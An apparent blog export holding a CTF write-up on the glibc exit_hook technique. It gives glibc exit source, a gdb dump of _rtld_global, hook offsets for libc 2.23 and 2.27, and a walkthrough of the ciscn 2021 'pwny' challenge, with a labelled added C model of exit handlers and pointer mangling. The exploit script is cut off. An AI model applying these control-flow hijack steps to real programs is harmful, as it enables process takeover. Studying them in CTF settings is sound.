search.xml
<?xml version="1.0" encoding="utf-8"?>
<search>
<entry>
<title>PWN notes: exit_hook, taking the base</title>
<link href="2021/05/20/PWN%E5%AD%A6%E4%B9%A0%E2%80%94exit-hook-%E5%81%B7%E5%AE%B6/"/>
<url>2021/05/20/PWN%E5%AD%A6%E4%B9%A0%E2%80%94exit-hook-%E5%81%B7%E5%AE%B6/</url>
<content type="html"><![CDATA[<h1 id="PWN学习—exit-hook—悄无声息地偷家"><a href="#PWN学习—exit-hook—悄无声息地偷家" class="headerlink" title="PWN学习—exit_hook—悄无声息地偷家"></a><code>PWN</code> notes: <code>exit_hook</code>, taking the base unnoticed</h1><h2 id="概述"><a href="#概述" class="headerlink" title="概述"></a>Overview</h2><p>On <code>linux</code> the very last thing a process does is call the <code>exit</code> function; in other words, every program ends up calling <code>exit</code>. An attack aimed at <code>exit</code> therefore applies to a very wide range of programs, which is what makes it important: whoever controls <code>exit</code> controls the whole process.</p><h2 id="原理"><a href="#原理" class="headerlink" title="原理"></a>Principle</h2><p>If we <code>hook</code> <code>exit</code> at the moment the program executes it, redirecting it to a function of our choosing, we control what the program does next.</p><p>First, what <a href="https://blog.csdn.net/sunstars2009918/article/details/39340449"><code>hook</code> techniques</a> are about: a function pointer, and one that can be modified.</p><p>So how is an <code>exit_hook</code> achieved?</p><p>Start with the source of <code>exit</code> (<code>/glibc2.23/stdlib/exit.c</code>):</p><figure class="highlight c"><table><tr><td class="code"><pre><span class="line">/* Copyright (C) 1991-2016 Free Software Foundation, Inc.</span><br><span class="line">   This file is part of the GNU C Library.</span><br><span class="line"></span><br><span class="line">   The GNU C Library is free software; you can redistribute it and/or</span><br><span class="line">   modify it under the terms of the GNU Lesser General Public</span><br><span class="line">   License as published by the Free Software Foundation; either</span><br><span class="line">   version 2.1 of the License, or (at your option) any later version.</span><br><span class="line"></span><br><span class="line">   The GNU C Library is distributed in the hope that it will be useful,</span><br><span class="line">   but WITHOUT ANY WARRANTY; without even the implied warranty of</span><br><span class="line">   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU</span><br><span class="line">   Lesser General Public License for more details.</span><br><span class="line"></span><br><span class="line">   You should have received a copy of the GNU Lesser General Public</span><br><span class="line">   License along with the GNU C Library; if not, see</span><br><span class="line">   <http://www.gnu.org/licenses/>.  */</span><br><span class="line"></span><br><span class="line">#include <stdio.h></span><br><span class="line">#include <stdlib.h></span><br><span class="line">#include <unistd.h></span><br><span class="line">#include <sysdep.h></span><br><span class="line">#include "exit.h"</span><br><span class="line"></span><br><span class="line">#include "set-hooks.h"</span><br><span class="line">DEFINE_HOOK (__libc_atexit, (void))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">/* Call all functions registered with `atexit' and `on_exit',</span><br><span class="line">   in the reverse of the order in which they were registered</span><br><span class="line">   perform stdio cleanup, and terminate program execution with STATUS.  */</span><br><span class="line">void</span><br><span class="line">attribute_hidden</span><br><span class="line">__run_exit_handlers (int status, struct exit_function_list **listp,</span><br><span class="line">                     bool run_list_atexit)</span><br><span class="line">{</span><br><span class="line">  /* First, call the TLS destructors.  */</span><br><span class="line">#ifndef SHARED</span><br><span class="line">  if (&__call_tls_dtors != NULL)</span><br><span class="line">#endif</span><br><span class="line">    __call_tls_dtors ();</span><br><span class="line"></span><br><span class="line">  /* We do it this way to handle recursive calls to exit () made by</span><br><span class="line">     the functions registered with `atexit' and `on_exit'.  We call</span><br><span class="line">     everyone on the list and use the status value in the last</span><br><span class="line">     exit ().  */</span><br><span class="line">  while (*listp != NULL) {</span><br><span class="line">    struct exit_function_list *cur = *listp;</span><br><span class="line"></span><br><span class="line">    while (cur->idx > 0){</span><br><span class="line">      const struct exit_function *const f =</span><br><span class="line">        &cur->fns[--cur->idx];</span><br><span class="line">      switch (f->flavor){</span><br><span class="line">        void (*atfct) (void);</span><br><span class="line">        void (*onfct) (int status, void *arg);</span><br><span class="line">        void (*cxafct) (void *arg, int status);</span><br><span class="line"></span><br><span class="line">      case ef_free:</span><br><span class="line">      case ef_us:</span><br><span class="line">        break;</span><br><span class="line">      case ef_on:</span><br><span class="line">        onfct = f->func.on.fn;</span><br><span class="line">#ifdef PTR_DEMANGLE</span><br><span class="line">        PTR_DEMANGLE (onfct);</span><br><span class="line">#endif</span><br><span class="line">        onfct (status, f->func.on.arg);</span><br><span class="line">        break;</span><br><span class="line">      case ef_at:</span><br><span class="line">        atfct = f->func.at;</span><br><span class="line">#ifdef PTR_DEMANGLE</span><br><span class="line">        PTR_DEMANGLE (atfct);</span><br><span class="line">#endif</span><br><span class="line">        atfct ();</span><br><span class="line">        break;</span><br><span class="line">      case ef_cxa:</span><br><span class="line">        cxafct = f->func.cxa.fn;</span><br><span class="line">#ifdef PTR_DEMANGLE</span><br><span class="line">        PTR_DEMANGLE (cxafct);</span><br><span class="line">#endif</span><br><span class="line">        cxafct (f->func.cxa.arg, status);</span><br><span class="line">        break;</span><br><span class="line">      }</span><br><span class="line">    }</span><br><span class="line"></span><br><span class="line">    *listp = cur->next;</span><br><span class="line">    if (*listp != NULL)</span><br><span class="line">      /* Don't free the last element in the chain, this is the statically</span><br><span class="line">         allocate element.  */</span><br><span class="line">      free (cur);</span><br><span class="line">  }</span><br><span class="line"></span><br><span class="line">  if (run_list_atexit)</span><br><span class="line">    RUN_HOOK (__libc_atexit, ());</span><br><span class="line">  _exit (status);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">void</span><br><span class="line">exit (int status){</span><br><span class="line">  __run_exit_handlers (status, &__exit_funcs, true);</span><br><span class="line">}</span><br><span class="line">libc_hidden_def (exit)</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>Look at <code>void exit</code> first: it calls <code>__run_exit_handlers</code>, whose definition sits just above it. Next we debug the program dynamically and watch how this plays out in practice.</p><p>Debugging to see which functions <code>exit</code> calls while it runs:</p><p><img src="/images/exit/1.png" class="lazyload" data-srcset="/images/exit/1.png" srcset="" alt="image-20210517232019480"></p><p>This matches the source: it is the part where <code>exit</code> calls <code>__run_exit_handlers</code>. Stepping into that function, we first list every <code>call</code> it makes:</p><p><img src="/images/exit/image-20210517232959154.png" class="lazyload" data-srcset="/images/exit/image-20210517232959154.png" srcset="" alt="image-20210517232959154"></p><p><img src="/images/exit/image-20210517233027056.png" class="lazyload" data-srcset="/images/exit/image-20210517233027056.png" srcset="" alt="image-20210517233027056"></p><p><img src="/images/exit/image-20210517233437699.png" class="lazyload" data-srcset="/images/exit/image-20210517233437699.png" srcset="" alt="image-20210517233437699"></p>
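<p>Added example (not code from the original post and not glibc's own): a small user-space model of the exit-function list that the <code>__run_exit_handlers</code> listing above walks. It shows the three flavors (<code>ef_at</code>, <code>ef_on</code>, <code>ef_cxa</code>) running in reverse registration order and the <code>PTR_MANGLE</code>/<code>PTR_DEMANGLE</code> step that protects each stored pointer. The names <code>my_atexit</code>, <code>run_exit_handlers</code>, <code>raw_write_is_redirected</code> and the constant guard value are assumptions made for the demo; glibc draws its guard at random at startup and keeps it in the TCB.</p>

```c
/* Added example (not glibc's code): a user-space model of the exit-function
 * list walked by __run_exit_handlers, with the PTR_MANGLE / PTR_DEMANGLE step.
 * Assumptions: GCC or Clang on a 32- or 64-bit host; the guard below is a
 * constructed constant, whereas glibc uses a per-process random value. */
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MAX_FNS  8
#define PTR_BITS (sizeof(uintptr_t) * 8)
/* glibc's x86 PTR_MANGLE rotates by 2*LP_SIZE+1 bits: 17 on x86-64, 9 on i386. */
#define ROT_BITS (2 * sizeof(uintptr_t) + 1)

static const uintptr_t pointer_guard = (uintptr_t)0x5a5a5a5a5a5a5a5aULL; /* constructed */

static uintptr_t rotl(uintptr_t v, unsigned n) { return (v << n) | (v >> (PTR_BITS - n)); }
static uintptr_t rotr(uintptr_t v, unsigned n) { return (v >> n) | (v << (PTR_BITS - n)); }

/* PTR_MANGLE: xor with the guard, then rotate left. PTR_DEMANGLE undoes it. */
uintptr_t ptr_mangle(uintptr_t p)   { return rotl(p ^ pointer_guard, ROT_BITS); }
uintptr_t ptr_demangle(uintptr_t p) { return rotr(p, ROT_BITS) ^ pointer_guard; }

enum flavor { ef_free, ef_us, ef_on, ef_at, ef_cxa };   /* same names as glibc */

struct exit_function { enum flavor flavor; uintptr_t fn; void *arg; }; /* fn stored mangled */
struct exit_function_list { size_t idx; struct exit_function fns[MAX_FNS]; };

static struct exit_function_list exit_funcs;   /* stands in for __exit_funcs */
static char trace[MAX_FNS + 1];                /* order in which handlers ran */

static bool push(enum flavor fl, uintptr_t fn, void *arg)
{
    if (exit_funcs.idx >= MAX_FNS)
        return false;
    struct exit_function *f = &exit_funcs.fns[exit_funcs.idx++];
    f->flavor = fl;
    f->fn = ptr_mangle(fn);     /* atexit() & co. mangle before storing */
    f->arg = arg;
    return true;
}

bool my_atexit(void (*fn)(void))                       { return push(ef_at,  (uintptr_t)fn, NULL); }
bool my_on_exit(void (*fn)(int, void *), void *arg)    { return push(ef_on,  (uintptr_t)fn, arg); }
bool my_cxa_atexit(void (*fn)(void *, int), void *arg) { return push(ef_cxa, (uintptr_t)fn, arg); }

/* The inner loop of __run_exit_handlers: newest registration first, each
 * pointer demangled right before the call. Returns how many handlers ran. */
int run_exit_handlers(int status)
{
    int ran = 0;
    while (exit_funcs.idx > 0) {
        const struct exit_function *const f = &exit_funcs.fns[--exit_funcs.idx];
        uintptr_t target = ptr_demangle(f->fn);
        switch (f->flavor) {
        case ef_free:
        case ef_us:  break;
        case ef_on:  ((void (*)(int, void *))target)(status, f->arg); ran++; break;
        case ef_at:  ((void (*)(void))target)();                      ran++; break;
        case ef_cxa: ((void (*)(void *, int))target)(f->arg, status); ran++; break;
        }
    }
    return ran;
}

/* What the mangling buys: a value written into a slot without knowledge of
 * the guard is demangled into an unrelated address, so the write does not
 * pick the call target. True when the demangled value differs from the raw one. */
bool raw_write_is_redirected(uintptr_t raw)
{
    return ptr_demangle(raw) != raw;
}

static void h_at(void)             { strncat(trace, "A", 1); }
static void h_on(int st, void *a)  { (void)st; strncat(trace, (const char *)a, 1); }
static void h_cxa(void *a, int st) { (void)st; strncat(trace, (const char *)a, 1); }

/* Registers one handler of each flavor and returns the order they ran in. */
const char *demo_order(void)
{
    trace[0] = '\0';
    exit_funcs.idx = 0;
    my_atexit(h_at);                      /* registered first, runs last */
    my_on_exit(h_on, (void *)"B");
    my_cxa_atexit(h_cxa, (void *)"C");    /* registered last, runs first */
    run_exit_handlers(0);
    return trace;                         /* "CBA" */
}

int main(void)
{
    uintptr_t p = (uintptr_t)&h_at;
    printf("handlers ran in order: %s\n", demo_order());
    printf("mangle/demangle round trip: %s\n", ptr_demangle(ptr_mangle(p)) == p ? "ok" : "BROKEN");
    printf("raw value in a mangled slot is redirected: %s\n",
           raw_write_is_redirected(0x401136) ? "yes" : "no");
    return 0;
}
```

<p>Compile with <code>gcc</code> and run: the handlers report <code>CBA</code>, the mirror image of registration order, exactly as the <code>--cur->idx</code> loop above implies. The last line is the point that matters for the rest of this post: the <code>atexit</code> family is protected by the pointer guard, so a slot written without the guard does not become a chosen call target, whereas a plain function pointer (the <code>rtld</code> lock pointers examined below are stored that way) receives no such transformation, which is why those slots deserve attention in hardening work and memory-integrity checks.</p>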
<p><img src="/images/exit/image-20210517233519274.png" class="lazyload" data-srcset="/images/exit/image-20210517233519274.png" srcset="" alt="image-20210517233519274"></p><p><img src="/images/exit/image-20210517233541112.png" class="lazyload" data-srcset="/images/exit/image-20210517233541112.png" srcset="" alt="image-20210517233541112"></p><p><code>exit</code> first calls <code>__run_exit_handlers</code>; inside <code>__run_exit_handlers</code> it calls <code>__call_tls_dtors</code>, <code>_dl_fini</code>, <code>_IO_cleanup</code> and <code>_exit</code>, and it is <code>_exit</code> that finally ends the program with a system call.</p><p>Now each of the functions it calls, one at a time:</p><ul><li> <code>__call_tls_dtors</code></li></ul><p><img src="/images/exit/image-20210517234214952.png" class="lazyload" data-srcset="/images/exit/image-20210517234214952.png" srcset="" alt="image-20210517234214952"></p><p>After some reading: this function belongs to <code>TLS (Thread Local Storage)</code>; more precisely, it is a <code>TLS</code> destructor.</p><ul><li><code>_dl_fini</code></li></ul><p>This function is defined in <code>/glibc2.23/elf/dl_fini.c</code>:</p><p>……</p><hr><p>The code turns out to be very long... back to dynamic debugging instead.</p><p>This function calls, in order: <code>rtld_lock_default_lock_recursive</code>, <code>_dl_sort_map</code>, <code>rtld_lock_default_unlock_recursive</code>, <code>__do_global_dtors_aux</code>, <code>_fini</code></p><p><img src="/images/exit/image-20210517235621557.png" class="lazyload" data-srcset="/images/exit/image-20210517235621557.png" srcset="" alt="image-20210517235621557"></p><p><img src="/images/exit/image-20210517235726706.png" class="lazyload" data-srcset="/images/exit/image-20210517235726706.png" srcset="" alt="image-20210517235726706"></p><p><code>gdb</code> is not very readable here; debugging with <code>pwntools+IDA</code> instead makes it obvious that <code>rtld_lock_default_lock_recursive</code> and <code>rtld_lock_default_unlock_recursive</code> are reached through function pointers:</p><p><img src="/images/exit/image-20210519165932035.png" class="lazyload" data-srcset="/images/exit/image-20210519165932035.png" srcset="" alt="image-20210519165932035"></p><p><img src="/images/exit/image-20210519165957009.png" class="lazyload" data-srcset="/images/exit/image-20210519165957009.png" srcset="" alt="image-20210519165957009"></p><p><img src="/images/exit/image-20210519170015048.png" class="lazyload" data-srcset="/images/exit/image-20210519170015048.png" srcset="" alt="image-20210519170015048"></p><p>A bit more searching shows that the place where <code>rtld_lock_default_lock_recursive</code> and <code>rtld_lock_default_unlock_recursive</code> live is a struct of function pointers, which can be inspected in <code>pwndbg</code> with the <code>p</code> command:</p><figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">pwndbg> p _rtld_global</span><br><span class="line"><span class="variable">$1</span> = {</span><br><span class="line"> _dl_ns = {{</span><br><span class="line"> _ns_loaded = 0x7ffff7ffe170,</span><br><span class="line"> _ns_nloaded = 4,</span><br><span class="line"> _ns_main_searchlist = 0x7ffff7ffe428,</span><br><span class="line"> _ns_global_scope_alloc = 0,</span><br><span class="line"> _ns_unique_sym_table = {</span><br><span class="line"> lock = {</span><br><span class="line"> mutex = {</span><br><span class="line"> __data = {</span><br><span class="line"> __lock = 0,</span><br><span class="line"> __count = 0,</span><br><span class="line"> __owner = 0,</span><br><span class="line"> __nusers = 0,</span><br><span class="line"> __kind = 1,</span><br><span class="line"> __spins = 0,</span><br><span class="line"> __elision = 0,</span><br><span class="line"> __list = {</span><br><span class="line"> __prev = 0x0,</span><br><span class="line"> __next = 0x0</span><br><span class="line"> }</span><br><span class="line"> },</span><br><span class="line"> __size = <span class="string">'\000'</span> <repeats 16 <span
class="built_in">times</span>>, <span class="string">"\001"</span>, <span class="string">'\000'</span> <repeats 22 <span class="built_in">times</span>>,</span><br><span class="line"> __align = 0</span><br><span class="line"> }</span><br><span class="line"> },</span><br><span class="line"> entries = 0x0,</span><br><span class="line"> size = 0,</span><br><span class="line"> n_elements = 0,</span><br><span class="line"> free = 0x0</span><br><span class="line"> },</span><br><span class="line"> _ns_debug = {</span><br><span class="line"> r_version = 0,</span><br><span class="line"> r_map = 0x0,</span><br><span class="line"> r_brk = 0,</span><br><span class="line"> r_state = RT_CONSISTENT,</span><br><span class="line"> r_ldbase = 0</span><br><span class="line"> }</span><br><span class="line"> }, {</span><br><span class="line"> _ns_loaded = 0x0,</span><br><span class="line"> _ns_nloaded = 0,</span><br><span class="line"> _ns_main_searchlist = 0x0,</span><br><span class="line"> _ns_global_scope_alloc = 0,</span><br><span class="line"> _ns_unique_sym_table = {</span><br><span class="line"> lock = {</span><br><span class="line"> mutex = {</span><br><span class="line"> __data = {</span><br><span class="line"> __lock = 0,</span><br><span class="line"> __count = 0,</span><br><span class="line"> __owner = 0,</span><br><span class="line"> __nusers = 0,</span><br><span class="line"> __kind = 0,</span><br><span class="line"> __spins = 0,</span><br><span class="line"> __elision = 0,</span><br><span class="line"> __list = {</span><br><span class="line"> __prev = 0x0,</span><br><span class="line"> __next = 0x0</span><br><span class="line"> }</span><br><span class="line"> },</span><br><span class="line"> __size = <span class="string">'\000'</span> <repeats 39 <span class="built_in">times</span>>,</span><br><span class="line"> __align = 0</span><br><span class="line"> }</span><br><span class="line"> },</span><br><span class="line"> entries = 0x0,</span><br><span class="line"> size = 
0,</span><br><span class="line"> n_elements = 0,</span><br><span class="line"> free = 0x0</span><br><span class="line"> },</span><br><span class="line"> _ns_debug = {</span><br><span class="line"> r_version = 0,</span><br><span class="line"> r_map = 0x0,</span><br><span class="line"> r_brk = 0,</span><br><span class="line"> r_state = RT_CONSISTENT,</span><br><span class="line"> r_ldbase = 0</span><br><span class="line"> }</span><br><span class="line"> } <repeats 15 <span class="built_in">times</span>>},</span><br><span class="line"> _dl_nns = 1,</span><br><span class="line"> _dl_load_lock = {</span><br><span class="line"> mutex = {</span><br><span class="line"> __data = {</span><br><span class="line"> __lock = 0,</span><br><span class="line"> __count = 0,</span><br><span class="line"> __owner = 0,</span><br><span class="line"> __nusers = 0,</span><br><span class="line"> __kind = 1,</span><br><span class="line"> __spins = 0,</span><br><span class="line"> __elision = 0,</span><br><span class="line"> __list = {</span><br><span class="line"> __prev = 0x0,</span><br><span class="line"> __next = 0x0</span><br><span class="line"> }</span><br><span class="line"> },</span><br><span class="line"> __size = <span class="string">'\000'</span> <repeats 16 <span class="built_in">times</span>>, <span class="string">"\001"</span>, <span class="string">'\000'</span> <repeats 22 <span class="built_in">times</span>>,</span><br><span class="line"> __align = 0</span><br><span class="line"> }</span><br><span class="line"> },</span><br><span class="line"> _dl_load_write_lock = {</span><br><span class="line"> mutex = {</span><br><span class="line"> __data = {</span><br><span class="line"> __lock = 0,</span><br><span class="line"> __count = 0,</span><br><span class="line"> __owner = 0,</span><br><span class="line"> __nusers = 0,</span><br><span class="line"> __kind = 1,</span><br><span class="line"> __spins = 0,</span><br><span class="line"> __elision = 0,</span><br><span class="line"> 
__list = {</span><br><span class="line"> __prev = 0x0,</span><br><span class="line"> __next = 0x0</span><br><span class="line"> }</span><br><span class="line"> },</span><br><span class="line"> __size = <span class="string">'\000'</span> <repeats 16 <span class="built_in">times</span>>, <span class="string">"\001"</span>, <span class="string">'\000'</span> <repeats 22 <span class="built_in">times</span>>,</span><br><span class="line"> __align = 0</span><br><span class="line"> }</span><br><span class="line"> },</span><br><span class="line"> _dl_load_adds = 4,</span><br><span class="line"> _dl_initfirst = 0x0,</span><br><span class="line"> _dl_cpuclock_offset = 21967126905434,</span><br><span class="line"> _dl_profile_map = 0x0,</span><br><span class="line"> _dl_num_relocations = 88,</span><br><span class="line"> _dl_num_cache_relocations = 3,</span><br><span class="line"> _dl_all_dirs = 0x7ffff7ffec90,</span><br><span class="line"> _dl_rtld_map = {</span><br><span class="line"> l_addr = 140737351856128,</span><br><span class="line"> l_name = 0x400238 <span class="string">"/lib64/ld-linux-x86-64.so.2"</span>,</span><br><span class="line"> l_ld = 0x7ffff7ffce68,</span><br><span class="line"> l_next = 0x0,</span><br><span class="line"> l_prev = 0x7ffff7fd9000,</span><br><span class="line"> l_real = 0x7ffff7ffd9f0 <_rtld_global+2448>,</span><br><span class="line"> l_ns = 0,</span><br><span class="line"> l_libname = 0x7ffff7ffe030 <_dl_rtld_libname>,</span><br><span class="line"> l_info = {0x0, 0x0, 0x7ffff7ffcee8, 0x7ffff7ffced8, 0x7ffff7ffce78, 0x7ffff7ffce98, 0x7ffff7ffcea8, 0x7ffff7ffcf18, 0x7ffff7ffcf28, 0x7ffff7ffcf38, 0x7ffff7ffceb8, 0x7ffff7ffcec8, 0x0, 0x0, 0x7ffff7ffce68, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7ffff7ffcef8, 0x0, 0x0, 0x7ffff7ffcf08, 0x0 <repeats 12 <span class="built_in">times</span>>, 0x7ffff7ffcf58, 0x7ffff7ffcf48, 0x0, 0x0, 0x7ffff7ffcf78, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7ffff7ffcf68, 0x0 <repeats 25 <span class="built_in">times</span>>, 
0x7ffff7ffce88},</span><br><span class="line"> l_phdr = 0x7ffff7dd3040,</span><br><span class="line"> l_entry = 0,</span><br><span class="line"> l_phnum = 7,</span><br><span class="line"> l_ldnum = 0,</span><br><span class="line"> l_searchlist = {</span><br><span class="line"> r_list = 0x0,</span><br><span class="line"> r_nlist = 0</span><br><span class="line"> },</span><br><span class="line"> l_symbolic_searchlist = {</span><br><span class="line"> r_list = 0x0,</span><br><span class="line"> r_nlist = 0</span><br><span class="line"> },</span><br><span class="line"> l_loader = 0x0,</span><br><span class="line"> l_versions = 0x7ffff7fd98d0,</span><br><span class="line"> l_nversions = 6,</span><br><span class="line"> l_nbuckets = 17,</span><br><span class="line"> l_gnu_bitmask_idxbits = 3,</span><br><span class="line"> l_gnu_shift = 8,</span><br><span class="line"> l_gnu_bitmask = 0x7ffff7dd32d8,</span><br><span class="line"> {</span><br><span class="line"> l_gnu_buckets = 0x7ffff7dd32f8,</span><br><span class="line"> l_chain = 0x7ffff7dd32f8</span><br><span class="line"> },</span><br><span class="line"> {</span><br><span class="line"> l_gnu_chain_zero = 0x7ffff7dd3338,</span><br><span class="line"> l_buckets = 0x7ffff7dd3338</span><br><span class="line"> },</span><br><span class="line"> l_direct_opencount = 0,</span><br><span class="line"> l_type = lt_library,</span><br><span class="line"> l_relocated = 1,</span><br><span class="line"> l_init_called = 1,</span><br><span class="line"> l_global = 1,</span><br><span class="line"> l_reserved = 0,</span><br><span class="line"> l_phdr_allocated = 0,</span><br><span class="line"> l_soname_added = 0,</span><br><span class="line"> l_faked = 0,</span><br><span class="line"> l_need_tls_init = 0,</span><br><span class="line"> l_auditing = 0,</span><br><span class="line"> l_audit_any_plt = 0,</span><br><span class="line"> l_removed = 0,</span><br><span class="line"> l_contiguous = 0,</span><br><span class="line"> 
l_symbolic_in_local_scope = 0,</span><br><span class="line"> l_free_initfini = 0,</span><br><span class="line"> l_rpath_dirs = {</span><br><span class="line"> <span class="built_in">dirs</span> = 0x0,</span><br><span class="line"> malloced = 0</span><br><span class="line"> },</span><br><span class="line"> l_reloc_result = 0x0,</span><br><span class="line"> l_versyms = 0x7ffff7dd3914,</span><br><span class="line"> l_origin = 0x0,</span><br><span class="line"> l_map_start = 140737351856128,</span><br><span class="line"> l_map_end = 140737354129776,</span><br><span class="line"> l_text_end = 140737351992656,</span><br><span class="line"> l_scope_mem = {0x0, 0x0, 0x0, 0x0},</span><br><span class="line"> l_scope_max = 0,</span><br><span class="line"> l_scope = 0x0,</span><br><span class="line"> l_local_scope = {0x0, 0x0},</span><br><span class="line"> l_file_id = {</span><br><span class="line"> dev = 0,</span><br><span class="line"> ino = 0</span><br><span class="line"> },</span><br><span class="line"> l_runpath_dirs = {</span><br><span class="line"> <span class="built_in">dirs</span> = 0x0,</span><br><span class="line"> malloced = 0</span><br><span class="line"> },</span><br><span class="line"> l_initfini = 0x0,</span><br><span class="line"> l_reldeps = 0x0,</span><br><span class="line"> l_reldepsmax = 0,</span><br><span class="line"> l_used = 1,</span><br><span class="line"> l_feature_1 = 0,</span><br><span class="line"> l_flags_1 = 0,</span><br><span class="line"> l_flags = 0,</span><br><span class="line"> l_idx = 0,</span><br><span class="line"> l_mach = {</span><br><span class="line"> plt = 0,</span><br><span class="line"> gotplt = 0,</span><br><span class="line"> tlsdesc_table = 0x0</span><br><span class="line"> },</span><br><span class="line"> l_lookup_cache = {</span><br><span class="line"> sym = 0x7ffff7dd3480,</span><br><span class="line"> type_class = 1,</span><br><span class="line"> value = 0x7ffff7fd9000,</span><br><span class="line"> ret = 
0x7ffff79e70e8</span><br><span class="line"> },</span><br><span class="line"> l_tls_initimage = 0x0,</span><br><span class="line"> l_tls_initimage_size = 0,</span><br><span class="line"> l_tls_blocksize = 0,</span><br><span class="line"> l_tls_align = 0,</span><br><span class="line"> l_tls_firstbyte_offset = 0,</span><br><span class="line"> l_tls_offset = 0,</span><br><span class="line"> l_tls_modid = 0,</span><br><span class="line"> l_tls_dtor_count = 0,</span><br><span class="line"> l_relro_addr = 2266752,</span><br><span class="line"> l_relro_size = 2432,</span><br><span class="line"> l_serial = 0,</span><br><span class="line"> l_audit = 0x7ffff7ffde60 <_rtld_global+3584></span><br><span class="line"> },</span><br><span class="line"> audit_data = {{</span><br><span class="line"> cookie = 0,</span><br><span class="line"> bindflags = 0</span><br><span class="line"> } <repeats 16 <span class="built_in">times</span>>},</span><br><span class="line"> _dl_rtld_lock_recursive = 0x7ffff7dd40e0 <rtld_lock_default_lock_recursive>,</span><br><span class="line"> _dl_rtld_unlock_recursive = 0x7ffff7dd40f0 <rtld_lock_default_unlock_recursive>,</span><br><span class="line"> _dl_make_stack_executable_hook = 0x7ffff7de6ea0 <__GI__dl_make_stack_executable>,</span><br><span class="line"> _dl_stack_flags = 6,</span><br><span class="line"> _dl_tls_dtv_gaps = <span class="literal">false</span>,</span><br><span class="line"> _dl_tls_max_dtv_idx = 1,</span><br><span class="line"> _dl_tls_dtv_slotinfo_list = 0x7ffff7fd9960,</span><br><span class="line"> _dl_tls_static_nelem = 1,</span><br><span class="line"> _dl_tls_static_size = 4160,</span><br><span class="line"> _dl_tls_static_used = 144,</span><br><span class="line"> _dl_tls_static_align = 64,</span><br><span class="line"> _dl_initial_dtv = 0x7ffff7fdae10,</span><br><span class="line"> _dl_tls_generation = 1,</span><br><span class="line"> _dl_init_static_tls = 0x7ffff7ddf780 <_dl_nothread_init_static_tls>,</span><br><span
class="line"> _dl_wait_lookup_done = 0x0,</span><br><span class="line"> _dl_scope_free_list = 0x0</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>We only need to modify this pointer to <code>hook</code> the <code>exit</code> function (with a struct this long, can every field be hooked... just a random thought...)</p><p>Now that we know the principle, to <code>hook</code> it we still need the offsets of <code>rtld_lock_default_lock_recursive</code> and <code>rtld_lock_default_unlock_recursive</code>:</p><blockquote><p>Under <code>libc2.23</code> the offset is 0x5f0040, and the offsets of the two hooks are 3848 and 3850</p><p>Under <code>libc2.27</code> the offset is 0x61b060, and the offsets of the two hooks are 3840 and 3848</p></blockquote><ul><li><p><code>_IO_cleanup</code></p><p>As the name suggests, this cleans up the buffers: whatever is pending in them gets read in or written out (it seems mainly to flush whatever the buffer has not yet written out to <code>stdout</code>... I am not entirely clear what exactly it does here or what its function is; I only ran into a problem with it earlier while solving a challenge:</p><blockquote><p><code>get_started_3dsctf_2016</code>:</p><p>After the stack overflow, the final return address of the <code>rop</code> chain is usually written arbitrarily... typically <code>0xdeadbeaf</code>, but built that way the <code>flag</code> is not printed. If the final return address is the <code>exit</code> function instead, the output appears; the reason is that <code>exit</code> calls <code>_IO_cleanup</code>, which flushes the buffer</p></blockquote></li></ul><h2 id="example-ciscn-2021pwny"><a href="#example-ciscn-2021pwny" class="headerlink" title="example ciscn 2021pwny"></a><code>example</code> <code>ciscn 2021pwny</code></h2><p>Let's use the latest challenge as the example...</p><p>The main function:</p><p><img src="/images/exit/image-20210520141741337.png" class="lazyload" data-srcset="/images/exit/image-20210520141741337.png" srcset="" alt="image-20210520141741337"></p><p>The initialization function:</p><p><img src="/images/exit/image-20210520141221364.png" class="lazyload" data-srcset="/images/exit/image-20210520141221364.png" srcset="" alt="image-20210520141221364"></p><p>Here <code>fd</code> is set to <code>random</code> and stored on the <code>bss</code>, followed by the two feature functions:</p><p><img src="/images/exit/image-20210520141925177.png" class="lazyload" data-srcset="/images/exit/image-20210520141925177.png" srcset="" alt="image-20210520141925177"></p><p><img src="/images/exit/image-20210520141805749.png" class="lazyload" data-srcset="/images/exit/image-20210520141805749.png" srcset=""
alt="image-20210520141805749"></p><p>Let's also look at how the <code>write_self</code> function stores data on the <code>bss</code> segment:<img src="/images/exit/image-20210520142616632.png" class="lazyload" data-srcset="/images/exit/image-20210520142616632.png" srcset="" alt="image-20210520142616632"></p><p>The data storage here has no bounds check, so by controlling Index we get arbitrary address read and arbitrary address write... but because of <code>fd</code>, we cannot control the input. If we can change the input to <code>stdin</code>, that is, change the <code>fd</code> stored on the <code>bss</code> to 0, then we can get a <code>shell</code>...</p><p>If during <code>read</code> we let the program overwrite the <code>fd</code> on the <code>bss</code> segment with a random number, then it is almost certain that the program can no longer read anything from the modified <code>fd</code>. But what if we force a read at that point? Let's write an example to see:</p><p><img src="/images/exit/image-20210520151347815.png" class="lazyload" data-srcset="/images/exit/image-20210520151347815.png" srcset="" alt="image-20210520151347815"></p><p>From this we learn that when read reads from an undefined <code>fd</code> it reads nothing and returns -1; it does not <code>crash</code>.</p><p>Then from the <code>write_self</code> function it is obvious that if we modify <code>fd</code> and then read data through the modified <code>fd</code> to modify <code>fd</code> again, <code>v2</code> stays unchanged at 0 and is assigned directly to the <code>fd</code> on the <code>bss</code> segment, so <code>fd</code> becomes 0.</p><p>Only now do we have a true arbitrary address write.</p><p>We notice that the main function ends with a call to <code>exit</code>... is it hinting at something?</p><p>So our plan is: first set <code>fd</code> to 0, then use the arbitrary read to obtain <code>libc_base</code>, then use the arbitrary write to <code>hook exit</code>.</p><p>One more thing to note: when doing the arbitrary read we need to compute the offset; note the following code:</p><p><img src="/images/exit/image-20210520175121487.png" class="lazyload" data-srcset="/images/exit/image-20210520175121487.png" srcset="" alt="image-20210520175121487"></p><p><code>exp</code>:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span
